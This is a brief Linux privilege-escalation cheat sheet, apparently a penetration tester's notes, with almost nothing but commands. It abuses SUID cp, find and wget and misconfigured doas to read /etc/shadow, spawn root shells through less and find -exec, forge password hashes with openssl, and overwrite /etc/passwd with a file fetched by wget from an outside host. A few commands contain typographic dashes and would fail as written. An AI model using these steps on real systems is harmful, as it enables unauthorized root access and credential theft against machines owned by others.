# cp -- Il cp is SUID, you can copy privilegied files to /tmp and read them
cp /etc/shadow /tmp
# generate new account
openssl passwd -1 -salt username password
# Then create a fake /etc/passwd file, upload it to the target and cp
wget http://192.168.1.111:8000/passwd
cp passwd /etc/passwd
/usr/bin/doas
# doas
cat /etc/doas.conf
doas /usr/bin/less /var/log/authlog
# Press v to escape vi then
:!sh
/usr/bin/find
# find
touch raj
find raj -exec "whoami"\;
find raj -exec "/bin/sh"\;# another method
find /home –exec chmod u+s /usr/bin/wget \;
ls –la /usr/bin/wget
cat /etc/passwd
# then create another etc/passwd file and upload it
/usr/bin/micro
# micro editor
cat /etc/passwd | /usr/bin/micro
# Then generate another user
openssl passwd -1 -salt user3 pass123